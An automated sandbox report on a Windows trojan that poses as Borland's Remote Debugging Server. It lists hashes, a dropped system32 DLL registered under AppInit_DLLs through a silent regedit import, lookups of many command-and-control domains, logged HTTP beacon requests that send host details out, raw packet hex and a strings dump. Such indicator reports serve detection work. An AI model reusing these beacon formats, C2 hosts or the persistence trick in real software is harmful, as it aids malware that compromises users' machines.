Analysis Date2013-10-20 12:03:47
MD5fb5bcab1cb88e45db7e1437893fd2f6f
SHA103bbb1dd8fab51e4dbea9c94a2839bcfd748718a

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 21022f33153be445155da9235cda3d2c sha1: e316c68a065f509bf0f10d4da2d9d51779e7337c size: 90112
Section_ASM2 md5: 37a257effc7dd77530057912945d6b1f sha1: 1e853691fb24ea60606ae9080be4009cfa8f98bc size: 62976
Section.rdata md5: 3c7e6da28317c2c8b8ef705dfd06a2b2 sha1: fbf1019628a1ec12775e0e365ee92bcf0b6d0e14 size: 7680
Section.data md5: 40efc981febb7a5e2d2ab4cd63a866b0 sha1: 78972b7d931c9708fa1af66e4fdb9928219b9971 size: 5120
Section.tls md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section.rsrc md5: 0700f6ce8a5c5f57f0abb43c0bfc0e28 sha1: 013ef4a4db6e77f6a2b3b73eb17e54ab68d4b788 size: 17920
Timestamp2012-09-19 19:14:42
VersionLegalCopyright: Copyright © Borland Software Corporation 1990, 2001
InternalName: BORDBG61
FileVersion: 70.08.08.1442
CompanyName: Borland Software Corporation
ProductName: Borland Remote Debugging Server
ProductVersion: 51.00
FileDescription: Borland Remote Debugging Server
OriginalFilename: bordbg61.exe
PackerMicrosoft Visual C++ ?.?
PEhash19746141e60fb07d4ab720b5daa8a41068a18ff3
AVavgGeneric_r.BGJ
AVaviraTR/Vundo.Gen8

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Process
↳ C:\WINDOWS\Explorer.EXE

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{00021494-0000-0000-C000-000000000046}\Enum\Implementing ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\NetCache\AdminPinStartTime ➝
NULL
RegistryHKEY_CURRENT_USER\SessionInformation\ProgramCount ➝
NULL
Creates FileC:\WINDOWS\system32\jloaxga.dll
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Cookies\cf
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates ProcessC:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Winsock DNS91.233.89.106
Winsock DNSclickbeta.ru
Winsock DNSdenadb.com
Winsock DNSterrans.su
Winsock DNSnsknock.com
Winsock DNStryatdns.com
Winsock DNSclickclans.ru
Winsock DNSdenareclick.com
Winsock DNSfescheck.com
Winsock DNSinstrango.com
Winsock DNSflersomstk.com
Winsock DNStegimode.com
Winsock DNSnetrovad.com
Winsock DNSnshouse1.com
Winsock DNSforadns.com
Winsock DNSgetavodes.com
Winsock DNSclickstano.com

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝
C:\WINDOWS\system32\jloaxga.dll\\x00

Network Details:

DNSflersomstk.com
Type: A
62.116.143.17
DNSinstrango.com
Type: A
141.8.225.46
DNSinstrango.com
Type: A
173.212.56.249
DNSinstrango.com
Type: A
199.59.243.105
DNSinstrango.com
Type: A
62.116.181.25
DNSnsknock.com
Type: A
190.93.244.20
DNSnsknock.com
Type: A
190.93.246.20
DNSnsknock.com
Type: A
141.101.115.20
DNSnsknock.com
Type: A
190.93.245.20
DNSnsknock.com
Type: A
141.101.114.20
DNStegimode.com
Type: A
141.101.115.20
DNStegimode.com
Type: A
190.93.245.20
DNStegimode.com
Type: A
190.93.244.20
DNStegimode.com
Type: A
141.101.114.20
DNStegimode.com
Type: A
190.93.246.20
DNSdenadb.com
Type: A
141.101.114.20
DNSdenadb.com
Type: A
141.101.115.20
DNSdenadb.com
Type: A
190.93.245.20
DNSdenadb.com
Type: A
190.93.244.20
DNSdenadb.com
Type: A
190.93.246.20
DNSforadns.com
Type: A
208.73.211.246
DNSnshouse1.com
Type: A
208.73.211.247
DNSgetavodes.com
Type: A
DNStryatdns.com
Type: A
DNSfescheck.com
Type: A
DNSnetrovad.com
Type: A
DNSterrans.su
Type: A
DNSclickstano.com
Type: A
DNSdenareclick.com
Type: A
DNSclickbeta.ru
Type: A
DNSclickclans.ru
Type: A
HTTP GEThttp://flersomstk.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1971&av=0&vm=0&al=0&p=49&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg54cJNa5BXQmxwszu/I29ZDHBSS6UhmxmPzmIYu/Rb89
User-Agent:
HTTP GEThttp://instrango.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1971&av=0&vm=0&al=0&p=49&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg54cJNa5BXQmxwszu/I29ZDHBSS6UhmxmOaSzk5/b1OP
User-Agent:
HTTP GEThttp://nsknock.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1971&av=0&vm=0&al=0&p=49&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg54cJNa5BXQmxwszu/I29ZDHBSS6UhmxmHia6SCU0UEC
User-Agent:
HTTP GEThttp://tegimode.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1971&av=0&vm=0&al=0&p=49&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg54cJNa5BXQmxwszu/I29ZDHBSS6UhmxmF1dXVmRfA/d
User-Agent:
HTTP GEThttp://denadb.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1971&av=0&vm=0&al=0&p=49&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg54cJNa5BXQmxwszu/I29ZDHBSS6UhmxmL2Cx7WpI2IQ
User-Agent:
HTTP GEThttp://foradns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1971&av=0&vm=0&al=0&p=49&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg54cJNa5BXQmxwszu/I29ZDHBSS6UhmxmL2ySl/AhiFk
User-Agent:
HTTP GEThttp://nshouse1.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1971&av=0&vm=0&al=0&p=49&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg54cJNa5BXQmxwszu/I29ZDHBSS6UhmxmPjov4Nuxyrg
User-Agent:
HTTP GEThttp://91.233.89.106/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1971&av=0&vm=0&al=0&p=49&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg54cJNa5BXQmxwszu/I29ZDHBSS6UhmxmLd519q7I76X
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 62.116.143.17:80
Flows TCP192.168.1.1:1032 ➝ 141.8.225.46:80
Flows TCP192.168.1.1:1033 ➝ 190.93.244.20:80
Flows TCP192.168.1.1:1034 ➝ 141.101.115.20:80
Flows TCP192.168.1.1:1035 ➝ 141.101.114.20:80
Flows TCP192.168.1.1:1036 ➝ 208.73.211.246:80
Flows TCP192.168.1.1:1037 ➝ 208.73.211.247:80
Flows TCP192.168.1.1:1038 ➝ 91.233.89.106:80

Raw Pcap
0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 39373126   XX0000&key=1971&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d343926 6f733d35 2e312e32 3630302e   =49&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79673534 634a4e61 35425851 6d787773   yg54cJNa5BXQmxws
0x000000b0 (00176)   7a752f49 32395a44 48425353 3655686d   zu/I29ZDHBSS6Uhm
0x000000c0 (00192)   786d507a 6d495975 2f526238 39204854   xmPzmIYu/Rb89 HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20666c   TP/1.1..Host: fl
0x000000e0 (00224)   6572736f 6d73746b 2e636f6d 0d0a0d0a   ersomstk.com....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 39373126   XX0000&key=1971&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d343926 6f733d35 2e312e32 3630302e   =49&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79673534 634a4e61 35425851 6d787773   yg54cJNa5BXQmxws
0x000000b0 (00176)   7a752f49 32395a44 48425353 3655686d   zu/I29ZDHBSS6Uhm
0x000000c0 (00192)   786d4f61 537a6b35 2f62314f 50204854   xmOaSzk5/b1OP HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20696e   TP/1.1..Host: in
0x000000e0 (00224)   73747261 6e676f2e 636f6d0d 0a0d0a0a   strango.com.....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 39373126   XX0000&key=1971&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d343926 6f733d35 2e312e32 3630302e   =49&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79673534 634a4e61 35425851 6d787773   yg54cJNa5BXQmxws
0x000000b0 (00176)   7a752f49 32395a44 48425353 3655686d   zu/I29ZDHBSS6Uhm
0x000000c0 (00192)   786d4869 61365343 55305545 43204854   xmHia6SCU0UEC HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a206e73   TP/1.1..Host: ns
0x000000e0 (00224)   6b6e6f63 6b2e636f 6d0d0a0d 0a0d0a0a   knock.com.......
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 39373126   XX0000&key=1971&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d343926 6f733d35 2e312e32 3630302e   =49&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79673534 634a4e61 35425851 6d787773   yg54cJNa5BXQmxws
0x000000b0 (00176)   7a752f49 32395a44 48425353 3655686d   zu/I29ZDHBSS6Uhm
0x000000c0 (00192)   786d4631 6458566d 5266412f 64204854   xmF1dXVmRfA/d HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a207465   TP/1.1..Host: te
0x000000e0 (00224)   67696d6f 64652e63 6f6d0d0a 0d0a0a0a   gimode.com......
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 39373126   XX0000&key=1971&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d343926 6f733d35 2e312e32 3630302e   =49&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79673534 634a4e61 35425851 6d787773   yg54cJNa5BXQmxws
0x000000b0 (00176)   7a752f49 32395a44 48425353 3655686d   zu/I29ZDHBSS6Uhm
0x000000c0 (00192)   786d4c32 43783757 70493249 51204854   xmL2Cx7WpI2IQ HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a206465   TP/1.1..Host: de
0x000000e0 (00224)   6e616462 2e636f6d 0d0a0d0a 0d0a0a0a   nadb.com........
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 39373126   XX0000&key=1971&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d343926 6f733d35 2e312e32 3630302e   =49&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79673534 634a4e61 35425851 6d787773   yg54cJNa5BXQmxws
0x000000b0 (00176)   7a752f49 32395a44 48425353 3655686d   zu/I29ZDHBSS6Uhm
0x000000c0 (00192)   786d4c32 79536c2f 41686946 6b204854   xmL2ySl/AhiFk HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20666f   TP/1.1..Host: fo
0x000000e0 (00224)   7261646e 732e636f 6d0d0a0d 0a0a0a0a   radns.com.......
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 39373126   XX0000&key=1971&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d343926 6f733d35 2e312e32 3630302e   =49&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79673534 634a4e61 35425851 6d787773   yg54cJNa5BXQmxws
0x000000b0 (00176)   7a752f49 32395a44 48425353 3655686d   zu/I29ZDHBSS6Uhm
0x000000c0 (00192)   786d506a 6f76344e 75787972 67204854   xmPjov4Nuxyrg HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a206e73   TP/1.1..Host: ns
0x000000e0 (00224)   686f7573 65312e63 6f6d0d0a 0d0a0a0a   house1.com......
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 39373126   XX0000&key=1971&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d343926 6f733d35 2e312e32 3630302e   =49&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79673534 634a4e61 35425851 6d787773   yg54cJNa5BXQmxws
0x000000b0 (00176)   7a752f49 32395a44 48425353 3655686d   zu/I29ZDHBSS6Uhm
0x000000c0 (00192)   786d4c64 35313971 37493736 58204854   xmLd519q7I76X HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a203931   TP/1.1..Host: 91
0x000000e0 (00224)   2e323333 2e38392e 3130360d 0a0d0a0a   .233.89.106.....
0x000000f0 (00240)                                         


Strings
040904E4
1Cycle through the possible initial break settings9Request that the debugger resynchronize with the debuggee
1Display debugger and debuggee version information
51.00
70.08.08.1442
7Set the initial command for new command browser windows!Toggle the verbose output setting2Display the debugger time for every debuggee event1Display debugger and debuggee version information
8Configure mapping from file extension to source language
About WinDbg
Activate window
BINARY
BORDBG61
bordbg61.exe
Borland Remote Debugging Server
Borland Software Corporation
 Borland Software Corporation 1990, 2001
Cascade all floating windows&Horizontally tile all floating windows$Vertically tile all floating windows
Close all source windows-Close all windows that are error placeholders"Open a new docked window container
CompanyName
Copyright 
CWindowClass
Debug operations
Detach the current program
Display source when possibleGPerform symbol resolution for symbol strings without a module qualifier
Dock all undocked windows
FileDescription
FileVersion
                                 H
         (((((                  H
Halt the current program
Help contents and searches
         h((((                  H
InternalName
iphapi32.dll
KERNEL32.DLL
Kernel debugging control.Cycle through the available baud rate settings
LegalCopyright
Manage event filters
Manage open windows
:Manage windows using the Multiple Document Interface styleDAutomatically open a disassembly window when source is not available
mscoree.dll
Open a command browser window
Open the command window
Open the disassembly window
Open the help index
Open the help search dialog
Open the help table of contents)Open the help for the current window type)Open help for the currently selected text
"Open the process and thread window
Open the registers window
Open the scratch pad window"Open the process and thread window
OriginalFilename
ProductName
ProductVersion
Restart the Program"Stop debugging the current program
Run the Program)Handle the exception and continue running1Do not handle the exception, but continue running
Step over the next statement Step out of the current function1Run the program to the line containing the cursor
StringFileInfo
Toggle the status bar on or off
Toggle the status bar on or off,View or edit the font for the current window
Toggle the toolbar on or off
Trace into the next statement
Translation
Undock all docked windows
VarFileInfo
View program options
View the module list
View WinDbg's command line
VS_VERSION_INFO
 Window arrangement and selection
                          
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
0A@@Ju
>"0	QJ
0SSSSS
#0_t!T
0XR~\>
/:;;1+
<1889T5
1j(;6[w
/1KAOS_A
%]"(28
_,38Wf+
3^]^A>
:41 M,y:
<4bPlYH
]4^U;t
4}wuu'
6G(^6_P
6G(O6RP
6G(Z6OP
6RichNP
\-7bbN
7h50ff
7vyosq
8y{[Z	5
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
ADVAPI32.dll
AG{J2_
a<{hY6
[akq|RWStbZ
AlJf.)
An application has made an attempt to load the C runtime library incorrectly.
~A|.O1
aoauaFshWuM"-
A/qisW
{~[as?
`_ASM2
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
A-v@EP
a']ZKQ
b5*\^{
\bbsP+
btgee/
BY INSTALLING AND USING THIS SOFTWARE, YOU ARE CONSENTING TO BE BOUND BY AND ARE BECOMING A PARTY TO THIS AGREEMENT. IF YOU DO NOT AGREE TO ALL OF THE TERMS OF THIS AGREEMENT, CLICK THE "CANCEL" BUTTON AND THE INSTALLATION PROCESS WILL NOT CONTINUE. IF THESE TERMS ARE CONSIDERED AN OFFER, ACCEPTANCE IS EXPRESSLY LIMITED TO THESE TERMS. 
@C6ios
Catn:kGtrF
cjsj#JSZ
:CJSJ#JSZ
CloseHandle
CorExitProcess
`cp@Pr
cpteB%rwGr
CreateBitmap
Created and produced by Whole Tomato, Inc., 1733 Fessler St., Englewood, FL, USA, (408) 323-1590, info@wholetomato.com, www.wholetomato.com.
CreateWindowExA
- CRT not initialized
~C<utQ
	Cy)8G
@.data
D->CkE
DDDDDDDD
dddd, MMMM dd, yyyy
December
DecodePointer
DefWindowProcA
DeleteCriticalSection
DISCLAIMER OF WARRANTY. THE SOFTWARE, AND ANY SERVICES THAT YOU RECEIVE FROM WHOLE TOMATO ARE PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND. WHOLE TOMATO HEREBY DISCLAIMS ALL EXPRESS OR IMPLIED WARRANTIES, INCLUDING WITHOUT LIMITATION WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS DISCLAIMER OF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS AGREEMENT. SOME STATES DO NOT ALLOW EXCLUSIONS OF AN IMPLIED WARRANTY, SO THIS DISCLAIMER MAY NOT APPLY TO YOU AND YOU MAY HAVE OTHER LEGAL RIGHTS THAT VARY FROM STATE TO STATE OR BY JURISDICTION. 
DispatchMessageA
dniedT
DOMAIN error
:d_ tm
E3dONF
e6fe:ei
Ea}14D
E aol?
>/edne
E*"@EE
eeyiuiLbGc2
EG\AP!
eIqLe!d
eKAyeqI22lhn
EncodePointer
EnterCriticalSection
eoN%Ul
}\E,Tu
eTVYDkrSt
eupe'vioi
ExitProcess
EXPORT CONTROLS. You shall comply with all export laws and restrictions and regulations of the Department of Commerce, the United States Department of Treasury Office of Foreign Assets Control ("OFAC"), or other United States or foreign agency or authority, and not to export, or allow the export or re-export of the Software in violation of any such restrictions, laws or regulations (including, without limitation, export or re-export to destinations prohibited either in Country Groups Q, S, W, Y or Z country specified in the then current Supplement No. 1 to Section 770 of the U.S. Export Administration Regulations (or any successor supplement or regulations), or the OFAC regulations found at 31 C.F.R. 500 et seq.). By installing or using the Software, you are agreeing to the foregoing and you are representing and warranting that you are not located in, under the control of, or a national or resident of any restricted country or on any such list. 
eymsqL
February
FindWindowA
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
]FLV\(
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Friday
F< tnmw
G3qG_9
GDI32.dll
GetACP
GetActiveWindow
GetClientRect
GetCommandLineA
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDeviceCaps
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetMessageA
GetModuleFileNameA
GetModuleHandleW
GetOEMCP
GetProcAddress
GetProcessWindowStation
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemMetrics
GetSystemTimeAsFileTime
GetTickCount
GetUserObjectInformationA
GetVersion
GHnQ8$f!
-gHO6@
Goy0Wa
GRANT. Subject to the terms of this Agreement, Whole Tomato Software, Inc. ("Whole Tomato") hereby grants you a limited, personal, nontransferable, nonsublicensable, royalty-free, nonexclusive license to use one copy of the client software product you are about to install in object code form ("Software"). You may copy the Software for archival purposes, provided any copy must contain all of the original Software's proprietary notices. 
g|uIU6
GW"tEM
GwTHwvA
hdvVea
HeapAlloc
HeapCreate
HeapFree
HeapReAlloc
HeapSize
h@h@=L
HH:mm:ss
Huw@H[@
\?iF|E
iiST`dtdtYGr
i  iwuTsit
InitializeCriticalSectionAndSpinCount
InterlockedDecrement
InterlockedIncrement
i S-.1l tn
IsDebuggerPresent
IsValidCodePage
iWtG f
JanFebMarAprMayJunJulAugSepOctNovDec
January
jdMyds
j#Gh"Dil
j@j ^V
j*LP;t
Jo_ia.
j"Vj-j
jVY;?@
,#*]K,
KERNEL32.dll
Ks,fZZH
~kSM1Y
K>U(bX
laleo'g
Last modified: May 9, 2012
LCMapStringA
LCMapStringW
;L]Cv!c
LeaveCriticalSection
le'eoewr
lGnSwdths
LIMITATION OF LIABILITY. You assume the entire risk as to the quality and performance of the Software. Whole Tomato assumes no liability for the cost of any service or repair if the Software is defective 
LoadAcceleratorsA
LoadCursorA
LoadIconA
LoadLibraryA
lrt)tdi
lstrcmpiA
lTIosrr
m-5U?T)
ma&w.4
,'mduKI
MessageBoxA
Microsoft Visual C++ Runtime Library
MISCELLANEOUS. This Agreement represents the complete agreement concerning this license between the parties and supersedes all prior agreements and representations between them. It may be amended only by a writing executed by both parties. If any provision of this Agreement is held to be unenforceable for any reason, such provision shall be reformed only to the extent necessary to make it enforceable. This Agreement shall be governed by and construed under California law as such law applies to agreements between California residents entered into and to be performed within California. 
!$MM=$
MM/dd/yy
&}MM<i
MogESD
Monday
MultiByteToWideChar
MUM3ul
mY]jpWE
n@3[($
N3LFdIVF
nD"8!=
?nlt"8
N=@MPc
nnEn)cC
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
N|T1"j
|O-.,?
October
o".`-D
.OsTA#nnTs
otj\9*
o{tsnsg
/!o.XKC}H
>P4KS.
P5,t3ez
&P~ a	
pe fiwnW
pe n(ptl
pe vzQ68n  & runw
Pk,fadke
pl40TiWPnosps
Please contact the application's support team for more information.
p==$PH
PPPPPPPP
pPrc'r
Program: 
<program name unknown>
pSR5rtnG"2yntc
/P:t!%_@
- pure virtual function call
@q 2qB
;qGPYt
QueryPerformanceCounter
{q%/WD
ra6]73
?r"CU/
`.rdata
Rectangle
re.eyuxass
RegConnectRegistryA
RegisterClassExA
RegOpenKeyExA
R:eltec
!RfTwp&
rHdSs<tiHf
	rJcO	
 rPpe d)<ao
RtlUnwind
runtime error 
Runtime Error!
rwr3pe\7tm\
rxBHE}
RXBHE}
Saturday
S{(e-L
September
SetHandleCount
SetLastError
SetUnhandledExceptionFilter
s}GKQ[)
ShowWindow
s,ia!vi|er
SING error
SJ!6f^
SMB5^a
%sMceJ]smdi6
*s;`mj
sN8V:"
soCry`i"
SOFTWARE LICENSE AGREEMENT
"`sSeaSPm
s}t%@b
strcat
Sunday
SunMonTueWedThuFriSat
T=3gd2*a-?t
TCustomForm
TCvI3\`N[
?T[Df(
tehR!A
TerminateProcess
TERMINATION. Whole Tomato may, at its sole discretion, terminate this Agreement, the license granted herein, and your right to use or access the Software at any time. On termination, you must destroy all copies of the Software. 
TextOutA
The Software may be installed on more than one computer provided that you are the exclusive user of the Software. As used in this context, "you" shall be defined as an individual human person.
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
